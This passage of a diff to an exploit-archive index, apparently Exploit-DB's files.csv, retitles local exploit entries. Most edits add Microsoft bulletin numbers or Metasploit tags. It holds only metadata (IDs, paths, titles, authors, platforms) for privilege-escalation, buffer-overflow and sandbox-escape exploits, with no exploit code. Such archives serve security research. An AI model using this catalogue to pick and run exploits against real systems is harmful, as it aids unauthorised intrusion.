+18082,platforms/windows/local/18082.rb,"Mini-stream Ripper 3.0.1.1 - Buffer Overflow (Metasploit) (3)",2011-11-04,Metasploit,windows,local,0 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Privilege Escalation (3)",2011-11-05,zx2c4,linux,local,0 -18087,platforms/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021)",2011-11-05,Metasploit,windows,local,0 +18087,platforms/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,windows,local,0 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0 18105,platforms/linux/local/18105.sh,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,windows,local,0 18113,platforms/windows/local/18113.rb,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2011-11-14,Metasploit,windows,local,0 18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)",2011-11-21,hellok,win_x86,local,0 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - '.wav' Stack Buffer Overflow (Metasploit)",2011-11-22,Metasploit,windows,local,0 -18143,platforms/windows/local/18143.rb,"Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0 +18143,platforms/windows/local/18143.rb,"Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit)",2011-11-22,Metasploit,windows,local,0 18147,platforms/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,linux,local,0 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",windows,local,0 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)",2011-11-30,ryujin,windows,local,0 @@ -6820,7 +6826,7 @@ id,file,description,date,author,platform,type,port 18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 - (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,linux,local,0 18258,platforms/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local,0 -18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution",2012-01-08,"b33f & g11tch",windows,local,0 +18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)",2012-01-08,"b33f & g11tch",windows,local,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 18372,platforms/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0 @@ -6865,7 +6871,7 @@ id,file,description,date,author,platform,type,port 18954,platforms/windows/local/18954.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (Metasploit)",2012-05-30,Metasploit,windows,local,0 18959,platforms/multiple/local/18959.txt,"Browsers Browsers - Navigation Download Trick",2012-05-31,"Michal Zalewski",multiple,local,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Exploit",2012-06-07,b33f,windows,local,0 -19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,Metasploit,windows,local,0 +19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)",2012-06-11,Metasploit,windows,local,0 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit",1996-04-05,"Arthur Hagen",irix,local,0 19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit",1996-11-22,"Yuri Volobuev",irix,local,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty and SoReN",unix,local,0 @@ -7171,7 +7177,7 @@ id,file,description,date,author,platform,type,port 19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink",2000-05-10,foo,multiple,local,0 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd - SHELL Environmental Variable",2000-05-16,Sebastian,linux,local,0 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0 -19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler XML Privilege Escalation (Metasploit)",2012-07-19,Metasploit,windows,local,0 +19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,linux,local,0 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 @@ -7259,7 +7265,7 @@ id,file,description,date,author,platform,type,port 20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,windows,local,0 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,windows,local,0 20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local,0 -20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request",2000-10-03,"BindView's Razor Team",windows,local,0 +20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local,0 20274,platforms/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0 @@ -7362,7 +7368,7 @@ id,file,description,date,author,platform,type,port 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local,0 20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 20851,platforms/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",sco,local,0 -20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 +20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client - inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers",2001-05-24,"Georgi Guninski",windows,local,0 @@ -7568,7 +7574,7 @@ id,file,description,date,author,platform,type,port 21881,platforms/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow",2002-09-30,stanojr@iserver.sk,bsd,local,0 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21843,platforms/windows/local/21843.rb,"Microsoft Windows - Escalate UAC Execute RunAs (Metasploit)",2012-10-10,Metasploit,windows,local,0 -21844,platforms/windows/local/21844.rb,"Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080)",2012-10-10,Metasploit,windows,local,0 +21844,platforms/windows/local/21844.rb,"Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit)",2012-10-10,Metasploit,windows,local,0 21845,platforms/windows/local/21845.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Metasploit)",2012-10-10,Metasploit,windows,local,0 21848,platforms/linux/local/21848.rb,"Linux udev - Netlink Privilege Escalation (Metasploit)",2012-10-10,Metasploit,linux,local,0 21856,platforms/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification",2002-09-25,"Mike Riley",multiple,local,0 @@ -7675,7 +7681,7 @@ id,file,description,date,author,platform,type,port 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0 22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,linux,local,0 -40409,platforms/windows/local/40409.txt,"Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0 +40409,platforms/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun",2003-06-24,posidron,windows,local,0 22836,platforms/linux/local/22836.pl,"Elm 2.3/2.4 - Local TERM Environment Variable Buffer Overrun",1997-05-13,kokanin,linux,local,0 22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - SUID execve() System Call Race Condition Executable File Read (PoC)",2003-06-26,IhaQueR,linux,local,0 @@ -7785,7 +7791,7 @@ id,file,description,date,author,platform,type,port 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Privilege Escalation",2004-04-06,"Ian Vitek",windows,local,0 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0 -23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation",2004-04-18,mslug@safechina.net,windows,local,0 +23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit",2013-01-09,"Debasish Mandal",windows,local,0 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0 @@ -7804,7 +7810,7 @@ id,file,description,date,author,platform,type,port 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0 -24277,platforms/windows/local/24277.c,"Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation",2004-07-16,bkbll,windows,local,0 +24277,platforms/windows/local/24277.c,"Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0 24278,platforms/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",linux,local,0 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 24335,platforms/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0 @@ -7943,7 +7949,7 @@ id,file,description,date,author,platform,type,port 27231,platforms/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,linux,local,0 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0 27285,platforms/hardware/local/27285.txt,"Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,local,0 -27296,platforms/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005)",2013-08-02,Metasploit,windows,local,0 +27296,platforms/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)",2013-08-02,Metasploit,windows,local,0 27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0 27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 @@ -7955,7 +7961,7 @@ id,file,description,date,author,platform,type,port 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0 -27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 +27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,linux,local,0 27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local,0 27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0 @@ -8077,7 +8083,7 @@ id,file,description,date,author,platform,type,port 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0 31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0 -31576,platforms/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (Metasploit)",2014-02-11,Metasploit,windows,local,0 +31576,platforms/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)",2014-02-11,Metasploit,windows,local,0 31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - '.pls' Buffer Overflow (Metasploit)",2014-02-13,Metasploit,windows,local,0 31667,platforms/windows/local/31667.txt,"Microsoft Windows - SeImpersonatePrivilege - Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0 31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0 @@ -8119,7 +8125,7 @@ id,file,description,date,author,platform,type,port 32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,windows,local,0 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Privilege Escalation",2009-02-02,"Ruben Santamarta",windows,local,0 32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0 -32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,Metasploit,windows,local,0 +32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit)",2014-04-10,Metasploit,windows,local,0 32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",linux,local,0 32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x - PKCS#11 Implementation Unauthorized Access",2009-02-26,"Andreas Jellinghaus",linux,local,0 32813,platforms/osx/local/32813.c,"Apple Mac OSX (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation",2014-04-11,"Kenzley Alphonse",osx,local,0 @@ -8140,7 +8146,7 @@ id,file,description,date,author,platform,type,port 33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,windows,local,0 33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0 33161,platforms/php/local/33161.php,"PHP 5.3 - 'mail.log' Configuration Option 'open_basedir' Restriction Bypass",2009-08-10,"Maksymilian Arciemowicz",php,local,0 -33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,Metasploit,windows,local,0 +33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,windows,local,0 33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0 33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0 33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 <= 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0 @@ -8165,8 +8171,8 @@ id,file,description,date,author,platform,type,port 33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0 33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0 -33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,Metasploit,windows,local,0 -33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,Metasploit,windows,local,0 +33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0 +33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0 33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0 33904,platforms/linux/local/33904.txt,"Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition",2014-06-28,"Dawid Golunski",linux,local,0 33961,platforms/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Privilege Escalation",2014-07-03,LiquidWorm,windows,local,0 @@ -8200,20 +8206,20 @@ id,file,description,date,author,platform,type,port 34987,platforms/linux/local/34987.c,"Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure",2010-11-09,"Dan Rosenberg",linux,local,0 35010,platforms/ios/local/35010.c,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,ios,local,0 35019,platforms/windows/local/35019.py,"Microsoft Windows - OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 -35020,platforms/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060)",2014-10-20,Metasploit,win_x86,local,0 +35020,platforms/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)",2014-10-20,Metasploit,win_x86,local,0 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Privilege Escalation",2014-10-22,"Glafkos Charalambous",windows,local,0 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Buffer Overflow",2014-10-27,metacom,windows,local,0 35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 -35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (Metasploit)",2014-10-28,Metasploit,windows,local,0 +35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0 35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0 35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0 35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0 35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0 -35235,platforms/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution Through Python (MS14-064)",2014-11-14,Metasploit,windows,local,0 -35236,platforms/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064)",2014-11-14,Metasploit,windows,local,0 +35235,platforms/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0 +35236,platforms/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 35370,platforms/linux/local/35370.c,"Linux Kernel 3.14.5 (RHEL / CentOS 7) - 'libfutex' Privilege Escalation",2014-11-25,"Kaiqu Chen",linux,local,0 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow (SEH)",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 @@ -8251,10 +8257,10 @@ id,file,description,date,author,platform,type,port 35901,platforms/windows/local/35901.txt,"VideoLAN VLC Media Player 2.1.5 - DEP Access Violation",2015-01-26,"Veysel HATAS",windows,local,0 35902,platforms/windows/local/35902.txt,"VideoLAN VLC Media Player 2.1.5 - Write Access Violation",2015-01-26,"Veysel HATAS",windows,local,0 35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0 -35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004)",2015-02-03,Metasploit,windows,local,0 +35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)",2015-02-03,Metasploit,windows,local,0 35934,platforms/osx/local/35934.txt,"Apple Mac OSX < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local,0 35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0 -35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation",2015-01-29,KoreLogic,windows,local,0 +35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,windows,local,0 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0 @@ -8272,13 +8278,13 @@ id,file,description,date,author,platform,type,port 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Privilege Escalation",2011-11-09,IKCE,bsd,local,0 36310,platforms/lin_x86-64/local/36310.txt,"Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer - NaCl Sandbox Escape (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0 -36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation",2011-11-22,instruder,windows,local,0 +36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)",2011-11-22,instruder,windows,local,0 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,local,0 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 36424,platforms/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Privilege Escalation",2011-12-08,anonymous,linux,local,0 -36437,platforms/windows/local/36437.rb,"Publish-It - '.PUI' Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0 +36437,platforms/windows/local/36437.rb,"Publish-It - '.PUI' Buffer Overflow (SEH) (Metasploit)",2015-03-19,Metasploit,windows,local,0 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local 